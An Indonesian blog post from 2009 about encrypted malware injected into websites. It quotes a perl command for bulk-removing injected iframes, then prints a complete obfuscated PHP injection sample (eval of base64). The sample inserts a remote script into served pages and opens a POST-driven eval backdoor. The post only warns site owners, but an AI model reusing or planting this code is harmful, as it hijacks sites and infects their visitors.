Payah jika, Injeksi Malware dengan Script yang terenkripsi

Haizz ngga semua injeksi iframe / script codenya bisa dibaca dengan kasat mata,  ataupun pinginya dengan se-enaknya mengeksekusi peritah shell berikut

# find . -name ‘*.*’ | xargs perl -pi -e ’s/\<iframe src.*vistasearch\.info.*$\<\/iframe>//g’

dengan tujuan menghapus script secara global tanpa perlu melakukan e diting satu – per – satu pada  setiap file.  silahkan baca bahasan website  diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell tersebut.

dan ketika script injeksi yang masuk kedalam website anda seperti ini

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaXF1MTInKSl7ZnVuY3Rpb24gaXF1MTIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoYzNSaFkzUnBiMjV3Y205alpYTnphVzVuTG1OdmJTOXBiV0ZuWlhNdmIzVjBjMjkxY21OcGJtY3RiVzl5ZEdkaFoyVXRjSEp2WTJWemMybHVaeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlxdTEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGlxdTEyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXF1MTIxKSljYWxsX3VzZXJfZnVuYygkaXF1MTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdpcXUxMicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2lxdTEyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlxdTEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXF1MTIyJykpIT0naXF1MTIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Maka bersiap-siaplah bongkar setiap file yang ada.

akhir-kata berhati-hatilah dalam berselancar di dunia maya apalagi copy paste script karena buktinya website Broker Review aja Terkena Malware apalagi blog kita.

Incoming search terms for the article:

Related posts:

  1. Awas Injeksi Malware dari situs Broker Review Injeksi iframe yang disebabkan malware makin merajarela, bahkan situs broker...
  2. Website diblokir Google akibat injeksi iframe Apakah anda pernah mendapati web anda tampil seperti ini Bisa...
  3. awas Malware money2008.org dan Js/Downloader menginjeksi situs anda beberapa waktu lalu satu situs yang sempat saya kelola dan...
  4. WHMCS 4.0 yang penuh dengan BUG siapa yang tidak kenal satu applikasi billing untuk hoster yang...
  5. Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda Kemarin tiba-tiba dapat teguran abuse dari DC (baca:Data Center) kita...

Related posts brought to you by Yet Another Related Posts Plugin.

This entry was written by hadi and posted on Desember 10, 2009 at 4:02 pm and filed under Internet. Bookmark the permalink. Follow any comments here with the RSS feed for this post.

One Response to “Payah jika, Injeksi Malware dengan Script yang terenkripsi”

  1. 1
    Gema Lucatero Says:
    Februari 8th, 2010 at 1:03 am

    Great blog, although I think some of the stuff on itt is a little pre used lol.

Leave a Reply